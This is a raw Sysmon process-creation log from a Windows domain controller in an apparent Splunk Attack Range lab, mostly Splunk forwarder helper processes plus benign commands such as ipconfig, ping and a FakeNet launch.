Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030473Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:17.895{A8622C2F-47E1-6078-0A06-00000000AE01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030464Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:17.132{A8622C2F-47E1-6078-0906-00000000AE01}3012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:23.315{A8622C2F-47AB-6078-0806-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000030328Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:21.641{A8622C2F-47A9-6078-0706-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030316Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:21.083{A8622C2F-47A9-6078-0606-00000000AE01}5844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:20.303{A8622C2F-47A8-6078-0506-00000000AE01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:18.556{A8622C2F-47A6-6078-0406-00000000AE01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:17.888{A8622C2F-47A5-6078-0306-00000000AE01}5184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000030267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:17.126{A8622C2F-47A5-6078-0206-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:44.246{A8622C2F-4784-6078-0106-00000000AE01}6176C:\Windows\SysWOW64\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeipconfig /flushdnsC:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D99377A3CC218A71E27DFA4C6C4892A4,SHA256=5F2FF9DFA80DCBAE0301500B50F5BB10DDA257BE9C061B3CFCC9BA3C1FBC8891,IMPHASH=9CB4975E5FC345BA48C788102C18C1A6{A8622C2F-4783-6078-FF05-00000000AE01}6436C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" 154100x800000000000000030081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:43.138{A8622C2F-4783-6078-FF05-00000000AE01}6436C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe-----"C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\FakeNet.exe" 
C:\Users\Administrator\Downloads\Fakenet1.0c\Fakenet1.0b\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7DE393B4286292CF72FC087FA193771D,SHA256=489486CC2F68D1CDEC3A47A35EE7653CB1F13F8E7EB73C5FCD925F162FB92FCD,IMPHASH=6FAFEF2A4DE5987BE20D8FCCBBBCA571{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000030026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:23.323{A8622C2F-476F-6078-FE05-00000000AE01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:21.845{A8622C2F-476D-6078-FD05-00000000AE01}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030002Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:02:21.169{A8622C2F-476D-6078-FC05-00000000AE01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029992Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:20.298{A8622C2F-476C-6078-FB05-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:18.562{A8622C2F-476A-6078-FA05-00000000AE01}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029971Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:17.896{A8622C2F-4769-6078-F905-00000000AE01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029962Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:02:17.173{A8622C2F-4769-6078-F805-00000000AE01}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000029858Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:23.326{A8622C2F-4733-6078-F605-00000000AE01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:21.750{A8622C2F-4731-6078-F505-00000000AE01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029834Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:21.179{A8622C2F-4731-6078-F405-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:20.285{A8622C2F-4730-6078-F305-00000000AE01}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029813Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:18.405{A8622C2F-472E-6078-F205-00000000AE01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:01:17.894{A8622C2F-472D-6078-F105-00000000AE01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029795Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:01:17.163{A8622C2F-472D-6078-F005-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:23.337{A8622C2F-46F7-6078-EF05-00000000AE01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029674Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:22.003{A8622C2F-46F6-6078-EE05-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:21.321{A8622C2F-46F5-6078-ED05-00000000AE01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:00:20.285{A8622C2F-46F4-6078-EC05-00000000AE01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029642Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:18.828{A8622C2F-46F2-6078-EB05-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029632Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:17.991{A8622C2F-46F1-6078-EA05-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:17.164{A8622C2F-46F1-6078-E905-00000000AE01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000029597Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:00:12.770{A8622C2F-46EC-6078-E805-00000000AE01}6556C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping x.comC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 
